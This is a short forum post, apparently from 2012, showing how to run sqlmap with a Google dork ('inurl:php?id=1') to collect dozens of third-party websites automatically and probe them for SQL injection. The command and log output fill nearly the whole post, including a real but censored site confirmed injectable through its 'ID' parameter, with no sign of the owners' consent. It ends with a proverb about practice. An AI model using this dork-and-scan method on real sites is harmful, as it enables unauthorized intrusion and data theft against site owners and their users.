SQLMAP Google bot
Posted on 2012-10-8 22:48:33
RE
./sqlmap.py  -g GOOGLE HACK keyword


root@Dis9Team:/pen/sql/sqlmap# ./sqlmap.py  -g inurl:php?id=1

    sqlmap/1.0-dev-dbce417 - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:40:47

[22:40:47] [INFO] first request to Google to get the session cookie
[22:40:48] [INFO] using Google result page #1
[22:40:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
[22:40:54] [INFO] sqlmap got 100 results for your Google dork expression, 97 of them are testable targets
[22:40:54] [INFO] sqlmap got a total of 97 targets
url 1:
GET http://www.和谐.com/index.php?ID=1
do you want to test this url? [Y/n/q]
> Y
[22:40:58] [INFO] testing url http://www.和谐.com/index.php?ID=1
[22:40:58] [INFO] using '/pen/sql/sqlmap/output/results-09162012_1040pm.csv' as results file
[22:40:59] [INFO] testing connection to the target url
[22:41:01] [INFO] heuristics detected web page charset 'ISO-8859-2'
[22:41:01] [INFO] testing if the url is stable, wait a few seconds
[22:41:03] [INFO] url is stable
[22:41:03] [INFO] testing if GET parameter 'ID' is dynamic
sqlmap got a 302 redirect to 'http://www.和谐.com:80/404.php'. Do you want to follow? [Y/n] n
[22:41:11] [INFO] confirming that GET parameter 'ID' is dynamic
[22:41:12] [INFO] GET parameter 'ID' is dynamic
[22:41:13] [WARNING] reflective value(s) found and filtering out
[22:41:13] [INFO] heuristic test shows that GET parameter 'ID' might be injectable (possible DBMS: MySQL)
[22:41:13] [INFO] testing for SQL injection on GET parameter 'ID'
[22:41:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:41:18] [INFO] GET parameter 'ID' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:41:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:41:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:41:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n]
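Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a blade.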